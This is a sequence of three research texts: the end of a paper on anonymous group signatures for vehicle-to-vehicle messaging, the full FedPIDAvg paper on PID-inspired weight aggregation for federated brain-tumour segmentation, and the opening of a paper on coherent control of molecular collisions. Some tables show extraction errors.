certificates since RSU does not need privacy protection. When a vehicle \(i\) approaches the intersection area, it creates and broadcasts a group signature \(\sigma_{i}\) on et. The event-linking token \(T_{i}\) in \(\sigma_{i}\) serves as a temporary identifier of the vehicle \(i\) for the scheduling purpose. The vehicle continues to periodically update and sign its status information using the event signatures. The controller computes a safe input \(u_{i}\) for vehicle \(i\) based on the control strategy mentioned in the above step 2). Then the controller signs and broadcasts \((T_{i},u_{i})\) to inform the vehicle \(i\) to change its control input to \(u_{i}\). At the sender side, the group signature \(\sigma_{i}\) is computed only once for each event. In case of packet loss, \(\sigma_{i}\) can be re-broadcast once every \(n\) messages to enhance robustness [9]. At the receiver's side, \(\sigma_{i}\) is verified upon the first reception and stored for validating the following event signatures. Different intersections use different events to ensure that a vehicle won't be identified among intersections. But a vehicle's movement can be tracked within the intersection region in a short time period to enable the controller to run the scheduling algorithms and to monitor that the vehicle is following the controller's output. The controller can decide when to change to a new event according to the traffic densities. If there is a traffic jam in the intersection area, for example, when the average waiting time of a vehicle is about an hour, then the event will be updated less frequently and may last for hours. When the traffic density is low, events can be changed more frequently. The controller can choose to change events at the point when its scheduling algorithms start to sample a new set of vehicles, i.e., step 3) in the above description. If the controller uses an event for too long, the multiple activities of the same vehicle passing through the intersection can be identified. For example, a vehicle crossing the intersection at 9:00 in the morning and later passing through this intersection again at 17:00 in the afternoon if the controller uses the same event for a day. ### _Cooperative awareness messages_ This application enables vehicles to improve their awareness of the key road traffic events by exchanging status information, e.g., position, dynamics and attributes, in the periodically transmitted cooperative awareness messages (CAM) [4]. The information in CAMs forms the basis for many safety applications in V2X communications, such as collision avoidance, traffic condition warning, and hazard warning [5]. According to the European standard [4], the CAM generation interval is between \(0.1s\sim 1s\), and the data processing time of CAM should not exceed 50ms in order to ensure the effectiveness of the safety messages. Note that all the vehicles nearby have to use the same et within a certain time period to track a vehicle's local movements to avoid collisions. The et should also be updated periodically to protect a vehicle's long-term privacy. A simple way to deal with these problems is to pre-define et as a timestamp which is valid in a certain timeslot. For example, from 10:00 and to 10:10 am on 1 March 2017, all the vehicles will use the et \(:=``201703011000"\), and then switch to a new et \(:=``201703011010"\) from 10:10 am to 10:20 am, and so on. This approach for generating et does not rely on the presence of any central authority such as RSU. Instead, all the vehicles agree in advance to produce and update their ets using a pre-defined method. The advantage of this method is all the et that will be used in future become predictable. As a result, the time-consuming group signatures in our scheme can be computed offline when a vehicle does not have heavy computation work, e.g., parked at the garage. If the et is changed every 10 mins, then a total number of 144 ets are needed for a whole day's use. Using the evaluation results in next Section VII, computing 144 group signatures for these ets will only take 1.83s on the laptop and 22.8s on Raspberry Pi 3. Thus the offline computation of the group signatures can be made without being noticeable to the users. ## VII Implementation We have implemented the proposed \(\mathcal{ALE}\) scheme using the Pairing Based Cryptography (PBC) Library[1]. Our tests use a _d-type_ curves (\(d224\)) from PBC library. Although currently there is no agreement about a vehicle's on-board hardware capabilities, we present illustrative measures taken from an experiment done with an ASUS ZenBook3 UX390UA1 and a Raspberry Pi 3 (model B)[2]2. Footnote 1: Powered by Intel i7500U with SGB RAM Footnote 2: Powered by a 1.2GHz 64-bit quad-core ARM%8 CPU and 1GB RAM. In our \(\mathcal{ALE}\) scheme, the group signatures consists of 3 elements from \(\mathbb{G}_{1}\) and 5 elements from \(\mathbb{Z}_{p}\) which retains the normal size of a short group signature scheme [7, 11, 20] as shown in Table I. The event signatures are significantly shorter, consisting of 2 elements from \(\mathbb{Z}_{p}\). The actual size when implemented on curve d224 is summarised in Table II. The compressed size is obtained using PBC compression algorithm on the elements in \(\mathbb{G}_{1}\). Table III shows the running time of group operations including multiplication, exponentiation and pairing. _Optimisation of_GSign:_ This algorithm can be optimised to be pairing-free. Specifically, notice that the \(R_{4}\) can be transformed to: \[R_{4} =\hat{\mathfrak{e}}(B,g_{2})^{r_{x}}\hat{\mathfrak{e}}(h,\omega) ^{r_{a}}\hat{\mathfrak{e}}(h,g_{2})^{r_{y}+r_{g}}\] \[=\hat{\mathfrak{e}}(A,g_{2})^{r_{x}}\hat{\mathfrak{e}}(h,\omega) ^{r_{a}}\hat{\mathfrak{e}}(h,g_{2})^{a\cdot r_{x}+r_{y}+r_{g}}\] The pairings \(\hat{\mathfrak{e}}(A,g_{2})\), \(\hat{\mathfrak{e}}(h,\omega)\) and \(\hat{\mathfrak{e}}(h,g_{2})\) in \(R_{4}\) are reusable and does not depend on any variable generated during the procedure; therefore they can be computed in advance to reduce computation. _Optimisation_GVer:_ The number of pairing operations can be reduced by modifying \(\hat{R}_{4}\) as below: \[\hat{R}_{4} =\hat{\mathfrak{e}}(B,g_{2})^{r_{x}}\hat{\mathfrak{e}}(h,w)^{s_{ a}}\hat{\mathfrak{e}}(h,g_{2})^{s_{y}+s_{s}}\bigg{(}\frac{\hat{\mathfrak{e}}(B,w)}{ \hat{\mathfrak{e}}(g_{1},g_{2})}\bigg{)}^{c}\] \[=\hat{\mathfrak{e}}(\frac{B^{s_{x}}h^{s_{y}+s_{g}}}{g_{1}^{s}},g _{2})\ \hat{\mathfrak{e}}(h^{s_{a}}B^{c},w)\] Table IV summarised the number of group operations of GSign and GVer after optimisation. Here \(\mathit{mul}_{\mathbb{G}_{1}}\), \(\mathit{mul}_{\mathbb{G}_{T}}\), \(\mathit{exp}_{\mathbb{G}_{1}}\) and \(\mathit{exp}_{\mathbb{G}_{T}}\) are multiplications on \(\mathbb{G}_{1}\) and \(\mathbb{G}_{T}\), and exponentiations on \(\mathbb{G}_{1}\) and \(\mathbb{G}_{T}\), respectively. Despite the fact that processors we tested are multi-cored, neither PBC nor our implementation has utilised any parallelisation; hence it would be reasonable to expect our profiles being applicable even for single core processors. Our implementation does not have any curve dependency; therefore it can be easily ported to any other qualified curves by simply specifying a different curve parameter file. Table V presents the timing profile of our \(\mathcal{ALE}\) protocol. Each result is calculated on 1000 samples. ESPign and EVer are 10 times faster than GSign and GVer respectively. GSign and GVer only needs to be performed once for each event, \begin{table} \begin{tabular}{c|c|c|c} \hline & BBS [7] & TAA [11] & PS-OL & Ours \\ \hline Group Sig. & \(3\mathbb{G}_{1}+6\mathbb{Z}_{p}\) & \(\begin{array}{c}5G_{1}+3\mathbb{Z}_{p}\) (v1) \\ 7G_{1}+3\mathbb{Z}_{p}\) (v2) \\ \hline Event Sig. & \multicolumn{3}{c|}{N/A} & \multicolumn{1}{c}{\(2\mathbb{Z}_{p}\)} \\ \hline \end{tabular} \end{table} TABLE II: Size of signatures in \(\mathcal{ALE}\) (bytes). \begin{table} \begin{tabular}{c|c|c|c} \hline & Full & Compressed \\ \hline Group Sig. & 308 & 227 \\ Event Sig. & 56 & 56 \\ \hline \end{tabular} \end{table} TABLE I: Comparison of signature length. while \(\mathsf{ESign}\) and \(\mathsf{EVer}\) are for the frequent use of safety message authentication. Note that the time for \(\mathsf{Open}\) only includes the time for recovering \(A\); the search for user identity is the equality comparison which does not involve any cryptographic operations and can be optimised to be \(O(1)\) using \(A\) as index in the database. ## VIII Security analysis In this section, we informally describe the definitions of the security requirements of anonymity, traceability, event linkability and unforgeability and analyse that our protocol satisfies the correctness and these security requirements. Each security property is defined as an experiment conducted between an adversary and a challenger (see Figure 2 in the appendix). The adversary can win the experiment when certain conditions are satisfied. The protocol satisfies a security property defined by an experiment when any adversary's winning probability is negligible. For the sake of readability, the detailed security models and proofs can be found in the appendix. **Theorem 1**: _The AEE protocol is correct._ We show the correctness of the proposed protocol. First, the signing and verifying algorithms are correct because of the following relations: \[R_{1} =u^{r_{\alpha}}=u^{s_{\alpha}+c\alpha}=u^{s_{\alpha}}D^{c}\] \[R_{2} =\mathcal{H}_{2}(\mathsf{et})^{r_{y}}=\mathcal{H}_{2}(\mathsf{et} )^{s_{y}-cy}=\mathcal{H}_{2}(\mathsf{et})^{s_{y}}T^{-c}\] \[R_{3} =u^{r_{2}}D^{r_{x}}=u^{s_{\delta}+c\alpha^{x}}D^{s_{x}-c\alpha}=u^ {s_{\delta}}D^{s_{x}}\] \[R_{4} =\hat{\mathsf{e}}(B,g_{2})^{r_{x}}\hat{\mathsf{e}}(h,w^{r_{\alpha }}\hat{\mathsf{e}}(h,g_{2})^{s_{y}+s_{\delta}}\] \[=\hat{\mathsf{e}}(B,g_{2})^{s_{x}-c\alpha}\hat{\mathsf{e}}(h,w^{ s_{\alpha}}\hat{\mathsf{e}}(h,g_{2})^{s_{y}+s_{\delta}}\] \[=\hat{\mathsf{e}}(B,g_{2})^{s_{x}}\hat{\mathsf{e}}(h,w)^{s_{\alpha }}\hat{\mathsf{e}}(h,g_{2})^{s_{y}+s_{\delta}}\!\left(\frac{\hat{\mathsf{e}}(B,w)}{\hat{\mathsf{e}}(g_{1},g_{2})}\right)^{c}\] The last equation is because \(\hat{\mathsf{e}}(g_{1},g_{2})=\hat{\mathsf{e}}(B,w)\hat{\mathsf{e}}(B,g_{2})^{x}\)\(\hat{\mathsf{e}}(h,w)^{-\alpha}\hat{\mathsf{e}}(h,g_{2})^{y-\alpha x}\). The \(\mathsf{Open}\) algorithm is correct because of \(v^{\alpha}=u^{\ell\alpha}\). The \(\mathsf{Judge}\) algorithm is correct because \(\hat{\mathsf{e}}(A,wg_{2}^{x})=\hat{\mathsf{e}}(g_{1}h^{-y},g_{2})\) when \(A=(g_{1}h^{-y})^{\frac{1}{1+\alpha}x}\). The \(\mathsf{ESign}\) and \(\mathsf{EVer}\) are correct because \(R=\mathcal{H}_{1}(\mathsf{et})^{r}=\mathcal{H}_{1}(\mathsf{et})^{s_{x}-c_{y} }=\mathcal{H}_{1}(\mathsf{et})^{s_{x}}T^{-c}\). The \(\mathsf{Link}\) algorithm is correct because, it outputs 1 when \(i_{0}=i_{1}\) since \(T_{0}=T_{1}=\mathcal{H}_{1}(\mathsf{et})^{y}\). When \(i_{0},\neq i_{1}\), the probability that \(y_{i_{0}}=y_{i_{1}}\) is negligible since \(y_{i_{0}}\) and \(y_{i_{1}}\) are chosen uniformly at random. Then we know that \(T_{0}=\mathcal{H}_{1}(\mathsf{et})^{y_{0}}\neq T_{1}=\mathcal{H}_{1}(\mathsf{et })^{y_{i_{1}}}\) with overwhelming probability when \(i_{0},\neq i_{1}\). Therefore, the probability that \(\mathsf{Link}\) outputs 1 when \(i_{0}\neq i_{1}\) is negligible. **Theorem 2**: _The AEE protocol is anonymous under the XDH assumption._ _Following [6], anonymity is defined in a way that the adversary does not need to recover the identity of a signer only distinguishes which of two signers of its choice signed a target message of its choice. This definition covers both identity anonymity and unlinkability. In the experiment of defining anonymity, the adversary can learn the master issuing key, and the personal secret and group signing keys of any users except the challenge members. The adversary is not given the master opening key, otherwise identifying the signer would become trivial. In the proof, we construct an adversary who breaks the XDH assumption from an adversary who breaks the anonymity of the protocol. Intuitively, in a group signature \(\sigma=(D,B,T,c,s_{x},s_{y},s_{\alpha},s_{\delta})\), the part \((D,B)=(u^{\alpha},A\cdot h^{\alpha})\) is an encryption of the signer's identity and the other parts can be simulated using randoms. Since the encryption does not leak any information about \(A\), the adversary cannot use it to link two signatures of the same signer or different signers. This justifies why the protocol satisfies anonymity. **Theorem 3**: _The AEE protocol is traceable under the \(q\)-SDH assumption._ _In the experiment of defining traceability, an adversary generates a group signature \(\sigma\) on an event et and a message \(m\) of his choice. The adversary can learn the master opening key as well as any user's secret key and group signing key. The adversary wins if \(\sigma\) opens to an invalid member or the tracing proof does not verify. Note that the adversary is not given the master issuing key since this would allow the adversary to create dummy group members which cannot be tracked. The proof goes by constructing an adversary \(\mathcal{B}\) which breaks the \(q\)-SDH assumption using an adversary \(\mathcal{A}\) which breaks traceability as a subroutine. If the signature produced by the adversary \(\mathcal{A}\) is valid, then \(\mathcal{B}\) can extract a group signing key \((\Delta x,\Delta y,A=(g_{1}h^{-\Delta y})^{\frac{1}{1+\Delta x}})\) and \begin{table} \begin{tabular}{|c|c|c|c|c|} \hline & & ZenBook & Raspberry Pi 3 \\ \hline \multirow{2}{*}{_mul_}{_} & \(\mathsf{G}_{1}\) & 0.003 & 0.02 \\ & \(\mathsf{G}_{2}\) & 0.02 & 0.23 \\ & \(\mathsf{G}_{T}\) & 0.005 & 0.07 \\ \hline \multirow{2}{*}{_exp_} & \(\mathsf{G}_{1}\) & 0.92 & 5.65 \\ & \(\mathsf{G}_{2}\) & 6.48 & 60.47 \\ & \(\mathsf{G}_{T}\) & 2.35 & 26.52 \\ \hline _pairing_ & & 6.19 & 61.93 \\ \hline \end{tabular} \end{table} TABLE III: Performance of group operations (\(\mathsf{m}\)). \begin{table} \begin{tabular}{|c|c|c|c|c|} \hline \multicolumn{5}{|c|}{ZenBook3} \\ \hline \(\mathsf{GSign}\) & \(\mathsf{GVer}\) & \(\mathsf{ESign}\) & \(\mathsf{EVer}\) & \(\mathsf{Link}\) & \(\mathsf{Open}\) \\ 12.72 & 26.55 & 1.25 & 2.31 & \(<\)0.001 & 0.001 \\ \hline \multicolumn{5}{|c|}{Raspberry Pi 3} \\ \hline \(\mathsf{GSign}\) & \(\mathsf{GVer}\) & \(\mathsf{ESign}\) & \(\mathsf{EVer}\) & \(\mathsf{Link}\) & \(\mathsf{Open}\) \\ 158.62 & 201.84 & 16.02 & 24.66 & 0.004 & 0.012 \\ \hline \end{tabular} \end{table} TABLE V: Timing profile of \(\mathcal{ALE}\) (\(\mathsf{ms}\)). event-inking tokens \(T=\mathcal{H}_{1}(\text{et})^{\Delta y}\) using forking lemma. If this group signing key does not belong to any valid group member, then \(\mathcal{B}\) can use to construct a solution for the \(q\)-SDH problem. **Theorem 4**: _The AEE protocol is event linkable under the \(q\)-SDH assumption._ In the experiment of defining event-linkability, an adversary can learn the master opening key and any user's secret key and group signing key. The adversary produces two group signatures on the same event using group signing keys of his choice. The adversary wins if the two signatures are opened to the same signer but cannot be lined by the Link algorithm, or they are opened to different signers but are linked by the Link algorithm. The proof goes by constructing an adversary \(\mathcal{B}\), which breaks the \(q\)-SDH assumption using an adversary \(\mathcal{A}\), which breaks the event-linkability as a subroutine. If the two signatures produced by the adversary \(\mathcal{A}\) is valid, then \(\mathcal{B}\) can exact two group signing keys \((\Delta x_{b},\Delta y_{b},A_{b}=(g_{1}h^{-\Delta y_{b}})^{(\gamma+\Delta x_{b})})\) and event-inking tokens \(T_{b}=\mathcal{H}_{1}(\text{et})^{\Delta y_{b}}\) for \(b=0,1\) using forking lemma. If the two group signing keys are the same, then \(T_{0}=T_{1}\) and the Link algorithm should output \(1\). Otherwise, \(T_{0}\neq T_{1}\) and the Link algorithm should output \(0\). **Theorem 5**: _The AEE protocol is non-frameable under the DL assumption._ In the experiment of defining non-frameability of group signatures, an adversary can compromise the master issuing key, the master opening key and any user's secret key and group signing key. The adversary produces a group signature \(\sigma\) on an event et and a message \(m\) of his choice and a proof \(\pi\). The adversary wins if the signature and the proof are both valid and the signature is traced to a member whose group signing key is not compromised. The proof of this theorem goes by constructing an adversary \(\mathcal{B}\), which breaks the DL assumption using an adversary \(\mathcal{A}\), which breaks the non-frameability. **Theorem 6**: _The AEE protocol is event-unforgeable under the DL assumption._ In the experiment for defining the unforgeability of the event signature, an adversary can compromise the master issuing her, the master opening key, and any user's secret key and group signing key. The adversary produces two group signatures on the same event using group signing keys. The adversary wins if the two signatures are traced back to a single signer but Link failed to link them. Note that the experiment defining the unforgeability of the event linkability might look similar to the one for event linkability in Theorem 4. But the former definition considers a stronger adversary who can compromise the master issuing key and the master opening key and has access to oracles for producing group signatures and event signatures and for modifying the issuer's registration table. ## IX Conclusion We propose an efficient anonymous protocol which supports event-based linkability and revocation. Our protocol introduces a new method for generating temporary public keys to reduce the computational complexity of cryptographic operations. Our concept of event linkability generalises the previous notion of short-term linkability [19] by enabling flexibility on how the vehicles are linked in different situations. We illustrate how to apply our protocol in vehicular communications by two exemplar use cases. ## Acknowledgment This work has been funded by the UK EPSRC as part of the PETRAS IoT Research Hub - Cybersecurity of the Internet of Things grant no: EP/N02334X/1.
2304.12117
FedPIDAvg: A PID controller inspired aggregation method for Federated Learning
This paper presents FedPIDAvg, the winning submission to the Federated Tumor Segmentation Challenge 2022 (FETS22). Inspired by FedCostWAvg, our winning contribution to FETS21, we contribute an improved aggregation strategy for federated and collaborative learning. FedCostWAvg is a weighted averaging method that not only considers the number of training samples of each cluster but also the size of the drop of the respective cost function in the last federated round. This can be interpreted as the derivative part of a PID controller (proportional-integral-derivative controller). In FedPIDAvg, we further add the missing integral term. Another key challenge was the vastly varying size of data samples per center. We addressed this by modeling the data center sizes as following a Poisson distribution and choosing the training iterations per center accordingly. Our method outperformed all other submissions.
Leon Mächler, Ivan Ezhov, Suprosanna Shit, Johannes C. Paetzold
2023-04-24T14:20:53Z
http://arxiv.org/abs/2304.12117v1
# FedPIDAvg: A PID controller inspired aggregation method for Federated Learning ###### Abstract This paper presents FedPIDAvg, the winning submission to the Federated Tumor Segmentation Challenge 2022 (FETS22). Inspired by FedCostWAvg, our winning contribution to FETS21, we contribute an improved aggregation strategy for federated and collaborative learning. FedCostWAvg is a weighted averaging method that not only considers the number of training samples of each cluster but also the size of the drop of the respective cost function in the last federated round. This can be interpreted as the derivative part of a PID controller (proportional-integral-derivative controller). In FedPIDAvg, we further add the missing integral term. Another key challenge was the vastly varying size of data samples per center. We addressed this by modeling the data center sizes as following a Poisson distribution and choosing the training iterations per center accordingly. Our method outperformed all other submissions. Keywords:Federated Learning Brain Tumor Segmentation Control Multi-Modal Medical Imaging MRI MICCAI Challenges Machine Learning ## 1 Introduction Federated learning is a highly promising approach for privacy, and confidential learning across multiple data locations [1]. A vast set of applications exist, ranging from power grids to medicine [2]. Evidently, such approaches are of paramount importance for medical images, because patient information can be highly sensitive [3] and the distribution of medical expertise, as well as the prevalence of certain diseases, is extremely uneven. More practically, medical imaging data is extremely large in size, making the frequent transfer of data from a local clinic to a central server location very expensive [3]. Privacy and safety of patient data is even more emphasized when we consider the large illegal leaks of private medical records to the _dark web[4]_. Figure 1: Schematic illustration of the federated learning concept. One can see how multiple data centers make up one big federation. The training data is stored exclusively at the local centers, where the same model is trained locally for a defined task. E.g., brain tumor segmentation as in our case. In the aggregation step, the model weights are sent and collected at a central server location. Here, the model aggregation is performed and later broadcasted back to the local centers. This procedure is repeated until convergence or another stopping criteria is reached. ### FETS challenge The FETS challenge [5, 6, 7, 8, 9] is an initiative trying to address the main research question of federated learning: optimal aggregation of network weights coming from various data centers. In this paper, we try to address this issue by proposing a PID and classical statistics-inspired solution. ## 2 Prior work ### Federated Averaging (FedAvg) The traditional federated averaging (FedAvg) approach [10] employs an averaging strategy on the local model weights to update the global model, weighted by the training data set sizes of the local models. A model \(M_{i+1}\) is updated as follows: \[M_{i+1}=\frac{1}{S}\sum_{j=1}^{n}s_{j}M_{i}^{j}. \tag{1}\] Here, \(s_{j}\) is the number of samples that model \(M^{j}\) was trained on in round \(i\) and \(S=\sum_{j}s_{j}\). The definition is adapted from [11]. ### Federated Cost Weighted Averaging (FedCostWAvg) Last year, we proposed a new weighting strategy, which won the FETS21 challenge. It not only weighs by data center sizes but also by the amount by which the cost function decreased during the last step [11]. We termed this method FedCostWAvg, where the new model \(M_{i+1}\) is calculated in the following manner: \[M_{i+1}=\sum_{j=1}^{n}(\alpha\frac{s_{j}}{S}+(1-\alpha)\frac{k_{j}}{K})M_{i}^{ j}. \tag{2}\] with: \[k_{j}=\frac{c(M_{i-1}^{j})}{c(M_{i}^{j})},K=\sum_{j}k_{j}. \tag{3}\] Here, \(c(M_{i}^{j})\) is the cost of the model \(j\) at time-step \(i\), which is calculated from the local cost function [11]. Moreover, \(\alpha\) ranges between \([0,1]\) and is chosen to balance the impact of the cost improvements and the data set sizes. Last year, we won the challenge with an alpha value of \(\alpha=0.5\). We discussed that this weighting strategy adjusted for the training dataset size and also for local improvements in the last training round. ## 3 Methodology In the following chapter, we will first introduce and formalize our novel averaging concept named _FedPIDAvg_. Next, we will quickly describe the neural network architecture for brain tumor segmentation that was given by the challenge organizers and finally discuss our strategy regarding when to train and aggregate from which specific centers, depending on their training samples modeled using a simple Poisson distribution. ### Federated PID Weighted Averaging (FedPIDAvg) As was already mentioned in [11] David Naccache offered the observation that the idea of FedCostAvg is similar to that of a PID controller. Only the integral term is missing. The methodology of our new averaging method is novel in two ways: the PID-inspired added integral term, and a different way to calculate the differential term. Our method calculates the new model \(M_{i+1}\) in the following manner: \[M_{i+1}=\sum_{j=1}^{n}(\alpha\frac{s_{j}}{S}+\beta\frac{k_{j}}{K}+\gamma\frac{ m_{j}}{I})M_{i}^{j}. \tag{4}\] with: \[k_{j}=c(M_{i-1}^{j})-c(M_{i}^{j}),K=\sum_{j}k_{j}. \tag{5}\] and: \[m_{j}=\sum_{l=0}^{5}c(M_{i-l}),I=\sum_{j}m_{j}. \tag{6}\] \[\alpha+\beta+\gamma=1 \tag{7}\] Note that this time we use the absolute difference between the last cost and the new cost and no longer the ratio. The new strategy is still a weighted averaging strategy, where the weights are themselves weighted averages of three factors: the drop of the cost in the last round, the sum over the cost in the last rounds and the size of the training data set. These three factors are weighted by \(\alpha,\beta\) and \(\gamma\). Their choice needs to be optimized based on the use case, we chose \(0.45,0.45,0.1\) although we did not have the resources to cross validate them. ### U-Net for Brain Tumor Segmentation As a segmentation architecture, we were given by the organizers the 3D-Unet, a vastly successful neural network architecture in medical image analysis [12]. No modifications to the architecture were allowed in the challenge, we quickly depict it in Figure 1 for completeness. U-Nets constitute the state of the art for a vast set of applications, for example, brain tumor segmentation [13, 5], vessel segmentation [14, 15] and many more. ### Poisson-distribution modeling of the data samples per center In order to optimize the training speed over several federated rounds, it was possible to only select a subset of data centers for each federated round. In our last year's submission, we simply selected all centers every time. Another part of our submission this year is a novel way to select participating data centers at each federated round. To do so, we resorted to classical statistics means, namely, under the assumption that the dataset sizes follow a Poisson distribution: \[\begin{split} p(x;\lambda)=\frac{e^{-\lambda}\lambda^{x}}{x!}\\ \text{with }x=0,1,2,\cdots\end{split} \tag{8}\] we made the natural choice of dropping out outliers in most rounds, where outliers were defined as having \(x>2\lambda\). ## 4 Results The methods were evaluated on the data of the Fets challenge. It is desribed as: "FeTS borrows its data from the BraTS Continuous Evaluation, but additionally providing a data partitioning according to the acquisition origin for the training data. Ample multi-institutional, routine clinically-acquired, pre-operative baseline, multi-parametric Magnetic Resonance Imaging (mpMRI) scans of radiographically appearing glioblastoma (GBM) are provided as the training and validation data for the FeTS 2022 challenge. Specifically, the datasets used in the FeTS 2022 challenge are the subset of GBM cases from the BraTS Continuous Evaluation. Ground truth reference annotations are created and approved by expert board-certified neuroradiologists for every subject included in the training, validation, and testing datasets to quantitatively evaluate the performance of the participating algorithms." Amongst all submitted methods, FedPIDAvg performed best and won the challenge. In tables 1 and 2 we give last years results of FedCostWAvg in the last challenge and in tables 3 and 4 the results of FedPIDAvg in FETS22. Note that the data was different this year as well as the limits on available federated rounds. \begin{table} \begin{tabular}{|l|c|c|c|c|c|c|} \hline Label & Dice WT & Dice ET & Dice TC & Sens. WT & Sens. ET & Sens. TC \\ \hline Mean & 0,8248 & 0,7476 & 0,7932 & 0,8957 & 0,8246 & 0,8269 \\ \hline StdDev & 0,1849 & 0,2444 & 0,2643 & 0,1738 & 0,2598 & 0,2721 \\ \hline Median & 0,8936 & 0,8259 & 0,9014 & 0,948 & 0,9258 & 0,9422 \\ \hline 25th quantile & 0,8116 & 0,7086 & 0,8046 & 0,9027 & 0,7975 & 0,8258 \\ \hline 75th quantile & 0,9222 & 0,8909 & 0,942 & 0,9787 & 0,9772 & 0,9785 \\ \hline \end{tabular} \end{table} Table 1: Final performance of FedCostWAvg in the 2021 FETS Challenge, DICE and Sensitivity \begin{table} \begin{tabular}{|l|c|c|c|c|c|c|c|} \hline Label & Spec WT & Spec ET & Spec TC & H95 WT & H95 ET & H95 TC & Comm. Cost \\ \hline Mean & 0,9981 & 0,9994 & 0,9994 & 11,618 & 27,2745 & 28,4825 & 0,723 \\ \hline StdDev & 0,0024 & 0,0011 & 0,0014 & 31,758 & 88,566 & 88,2921 & 0,723 \\ \hline Median & 0,9986 & 0,9996 & 0,9998 & 5 & 2,2361 & 3,0811 & 0,723 \\ \hline 25th quantile & 0,9977 & 0,9993 & 0,9995 & 2,8284 & 1,4142 & 1,7856 & 0,723 \\ \hline 75th quantile & 0,9994 & 0,9999 & 0,9999 & 8,6023 & 3,5628 & 7,0533 & 0,723 \\ \hline \end{tabular} \end{table} Table 2: Final performance of FedCostWAvg in the 2021 FETS Challenge, Specificity, Hausdorff95 Distance and Communication Cost \begin{table} \begin{tabular}{|l|c|c|c|c|c|c|c|} \hline Label & Spec WT & Spec ET & Spec TC & H95 WT & H95 ET & H95 TC & Comm. Cost \\ \hline Mean & 0,76773526 & 0,741627265 & 0,769244434 & 0,749757737 & 0,770377324 & 0,765940502 \\ \hline StdDev & 0,183035406 & 0,266310234 & 0,284212379 & 0,208271565 & 0,280923214 & 0,297081407 \\ \hline Median & 0,826114563 & 0,848784494 & 0,896213442 & 0,819457864 & 0,886857246 & 0,893165349 \\ \hline 25quant & 0,700757354 & 0,700955694 & 0,739356651 & 0,637996476 & 0,728202272 & 0,73357786 \\ \hline 75quant & 0,897816734 & 0,910451814 & 0,943718628 & 0,905620122 & 0,956570051 & 0,964129538 \\ \hline \end{tabular} \end{table} Table 3: Final performance of FedPIDAvg in the 2022 FETS Challenge, DICE and Sensitivity \begin{table} \begin{tabular}{|l|c|c|c|c|c|c|} \hline Label & Spec WT & Spec ET & Spec TC & H95 WT & H95 ET & H95 TC & Comm. Cost \\ \hline Mean & 0,9989230 & 0,9995742 & 0,999692 & 24,367549 & 32,796706 & 32,466108 & 0,300 \\ \hline StdDev & 0,0016332 & 0,0007856 & 0,0006998 & 32,007897 & 89,31835 & 85,440174 & 0,300 \\ \hline Median & 0,9994479 & 0,9997990 & 0,999868 & 11,57583 & 2,4494897 & 4,5825756 & 0,300 \\ \hline 25th quant & 0,998690 & 0,9995254 & 0,999695 & 5,4081799 & 1,4142135 & 2,2360679 & 0,300 \\ \hline 75th quant & 0,9998540 & 0,9999292 & 0,9999584 & 36,454261 & 10,805072 & 12,359194 & 0,300 \\ \hline \end{tabular} \end{table} Table 4: Final performance of FedPIDAvg in the 2022 FETS Challenge, Specificity, Hausdorff95 Distance and Communication Cost ## 5 Conclusion This paper summarizes our winning contribution to the Federated Tumor Segmentation Challenge 2022. We submitted a PID-inspired aggregation strategy combined with a statistically inspired client selection. The aggregation function considers the number of training samples, the cost function decrease in the previous step as well as an integral term over the individual client's losses in the last rounds. The client selection models data center sizes as following a Poisson distribution and drops the outliers. Our method outperformed all other submissions. ## Acknowledgements We appreciate the valuable input from our supervisors, David Naccache, Adrian Dalca, and Bjoern Menze. Moreover, we want to express our appreciation to the organizers of the Federated Tumor Segmentation Challenge 2022. Leon Machler is supported by the Ecole normale superieure in Paris. Johannes C. Paetzold is supported by the DCoMEX project, financed by the Federal Ministry of Education and Research of Germany. Suprosanna Shit and Ivan Ezhov are supported by the Translational Brain Imaging Training Network (TRABIT) under the European Union's 'Horizon 2020' research & innovation program (Grant agreement ID: 765148). With the support of the Technical University of Munich - Institute for Advanced Study, funded by the German Excellence Initiative. Ivan Ezhov is also supported by the International Graduate School of Science and Engineering (IGSSE). Johannes C. Paetzold and Suprosanna Shit are supported by the Graduate School of Bioengineering, Technical University of Munich.
2306.13470
Robust Coherent Control of Bimolecular Collisions beyond the Ultracold Regime
Quantum coherent control of bimolecular collisions beyond the ultracold regime can face a major challenge due to the incoherent addition of different partial wave contributions to the total scattering cross section. These contributions become increasingly numerous as the collision energy increases, leading to a loss of overall control. Here, we overcome this limitation by leveraging the recently discovered Partial Wave Phase Locking (PWPL) effect, which synchronizes the oscillations of all partial wave contributions. By using rigorous quantum scattering calculations, we demonstrate that PWPL enables coherent control of spin exchange in ion-atom collisions, far outside the ultracold regime, even with as many as 5000 partial wave contributions. The predicted extent of control is sufficient to be measurable in cold atom-ion hybrid experiments.
Adrien Devolder, Paul Brumer, Timur Tscherbul
2023-06-23T12:17:59Z
http://arxiv.org/abs/2306.13470v1
# Robust Coherent Control of Bimolecular Collisions beyond the Ultracold Regime ###### Abstract Quantum coherent control of bimolecular collisions beyond the ultracold regime can face a major challenge due to the incoherent addition of different partial wave contributions to the total scattering cross section. These contributions become increasingly numerous as the collision energy increases, leading to a loss of overall control. Here, we overcome this limitation by leveraging the recently discovered Partial Wave Phase Locking (PWPL) effect, which synchronizes the oscillations of all partial wave contributions. By using rigorous quantum scattering calculations, we demonstrate that PWPL enables coherent control of spin exchange in ion-atom collisions, far outside the ultracold regime, even with as many as 5000 partial wave contributions. The predicted extent of control is sufficient to be measurable in cold atom-ion hybrid experiments. _Introduction-_ Two-body collisions and chemical reactions of atoms and molecules are responsible for a wide range of phenomena in physics and chemistry[1; 2; 3], such as energy transfer, thermalization, relaxation, decoherence, and spectral line broadening to name a few. As these phenomena determine the properties of dilute gases, they play a central role in atomic and molecular spectroscopy [4], atmospheric science [5], astrochemistry [6], and ultracold chemistry [7; 8]. For this reason, controlling the quantum dynamics of two-body collisions has long been a major thrust of physics and chemistry, and led to the development of several vast fields of research, including coherent control [9], laser control of chemical reactions [10], mode-selective chemistry [1] and stereochemistry [11; 12]. A key challenge in controlling binary collisions and chemical reactions lies in the random nature of scattering events. Specifically, under ambient conditions, the integral collision cross section (or reaction rate) is determined by many partial wave contributions, which are essentially random functions of \(\ell\), the orbital angular momentum for the collision [13; 1]. Quantum control protocols target a given partial wave contribution and rely in the phase of the underlying scattering amplitude (or S-matrix). Thus, the optimal values of the control parameter (be it the value of an external field in field-based control schemes, laser pulse parameters in optimal control, or superposition parameters in coherent control) are necessarily \(\ell\)-dependent, and thus cannot be optimized for all values of \(\ell\) contributing to the integral scattering cross section. This fundamental issue, which we will refer to as "partial wave scrambling" has generally 